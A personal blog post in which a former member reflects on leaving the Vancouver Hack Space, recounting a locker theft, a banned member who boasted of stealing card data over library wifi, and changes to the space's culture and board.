Someone cleaned out my locker and stole some of the items in the locker; other items ended up in the drop box. This happened between Thursday May 5th and May 11th. My locker was not locked, but was labeled with my name and there was a note in the locker that said "[person's] locker, not free, not available"
You have a thief and an asshole at the space. More bad people.
I don't suggest leaving anything of value at the space any more.

Back when VHS was smaller, this behaviour where items were stolen was exceedingly rare, to the point where it was more often things getting misplaced, borrowed, or general ignorance--and even then I am failing to remember if and when these circumstances arose. We were generally better at keeping assholes out of the space, and I would argue that until the move away from Hastings Street, the unwritten policy for how it was done went fairly well.

An example of a toxic individual being removed successfully was one person who came to the space in 2012 for one of our Super Happy Hacker Houses (SHHH). This was a periodic event we'd host where we'd have a keg, some music, lots of people, and then the later part of the evening devoted to three-minute lightning talks where one could talk about whatever cool topics we had in mind--I had previously given talks on generating tripcodes, lock-picking, and Python, to name a few.

This individual that evening chose a rather thoughtless talk: stealing credit card numbers from the wireless network at the Vancouver Public Library. It didn't get too much attention as it was towards the tail end of the evening, but it continued on the IRC channel later on. I ended up calling this person out on this, citing that it was fairly idiotic from an operational security point of view to openly admit that you were looking to commit fraud. His response was to use some uncreative insults, resulting in his removal from the IRC channel; he was then made aware that he was not welcome at VHS.

I'd say that this person's story with me ended there but he would later attempt to include himself in VanCitySec a few years later, resulting in him being removed from the IRC channel as well. He was then removed from being able to attend BSides Vancouver and then finally removed from OWASP's Vancouver chapter after he went off on the organizers and the speaker after the event had concluded when someone had enough of him interrupting their conversations. At an extreme level, he even managed to get a visit by the local police after he had admitted to intrusion on the wireless networks of the local transit agency.

It didn't help that later on I found out that he was harassing a friend of mine at a local meetup.

To this day, I still get him periodically showing up in the various Freenode channels I am in, taunting me over some non-existent botnet that he suspects I run. In almost all cases he ends up getting himself removed from the channel after I realise who he is.

In fairness, I do believe that he has some rather difficult problems to overcome (I have had people show me some aspects of his personal history that were troubling), but one of the things that I have learnt is that even if you know a reason for why someone exhibits shitty behaviour towards you or someone else, it is not something you have to sign up for and you should be able to remove that person if you feel it is necessary.

The reason why I bring up this person in particular is because he was the final straw for me deciding to leave the space: he was making an appearance again and I was finding it problematic that nobody was enforcing the ban--this was before the remarks about OWASP and the local meetup I should add.

When I spoke up on the mailing list, the response I got from someone who later ended up having someone at the space call the police on them was that he had every right to be in there--funny how assholes defend other assholes. At a meeting, he was eventually formally banned, but after a year the ban had apparently expired, in the space's own words: "[person] has since expired and he is welcome back at VHS".

I recently learnt that he had joined the hackspace after another encounter with him on Freenode, citing that I was an impediment to his membership. Of course, when he was banned in the first place, I had three people contact me privately letting me know that whatever decision VHS made would influence whether or not they'd be members.

This is not the only story involving harassment that I could bring up but this one I have first-hand knowledge of. I'm also exempting his name from this entry because I do not wish to attract his attention.

One of the things I can point out is that the whole makeup of how VHS is run and operated has changed since its beginnings. I'll use this photo as an example from the 2014 AGM:

Photo: VHS AGM 2014 Group Photo

In this photo, there are twelve men. I don't take exception to seeing twelve men, but I damn well know that in the past we had women as members, including some who served as board members--I'll clarify something about how this "board" works, or rather used to, in a bit. Hell, even the aforementioned Maker Faire event was put on for the first few years by someone about whom I cannot say enough good things in terms of creativity and organizational skills. The fact that in 2014, six years after VHS was founded, it would still show a mostly male face even though it is apparent there are female members and those from the LGBTQ community amongst the membership is downright distressing.

The board that VHS has was originally created to satisfy the requirements of the Societies Act, a law that governs non-profits and other like-minded organizations in British Columbia. I served two years on the board and we only officially met when it was time for our annual general meeting, which again was a requirement of the act. Its sole purpose was to satisfy those legal requirements and to make insurance easier for us to get, but since then the board has morphed into an overseeing eye, drafting policy and everything, which was beyond what VHS was meant to be.

All in all, by the time that the person was banned after discussion amongst members of the space, the board had become something that oversaw everything and VHS was something that it wasn't when I first joined five years earlier. The writing on the wall should have been apparent when walls were erected to keep the woodworking away from the rest of the space that things were going to change. When the ham operator group formed within VHS and wanted to form a society within the society for the purposes of getting government grants for themselves and themselves alone, I knew that my time was done.

Since then, I have visited the space once at its Cook Street location and while it definitely is still a hackerspace, the original vibe it had years prior is not there. It doesn't feel like it's doing anything challenging, and while there are members there I still respect and chat with periodically, I cannot say that I want anything to do with the organization.

Today, I find myself going to VanCitySec, other local security events, and am friends with people who share the same ethos that I do, but it is really saddening that a space like VHS in 2009 is no more and I believe that the only reason it died was because it wanted to be everything to everyone. The original space is something I truly miss.

Sometimes it's hard to notice that you're becoming a victim of your own success, and eventually you miss the forest for the trees.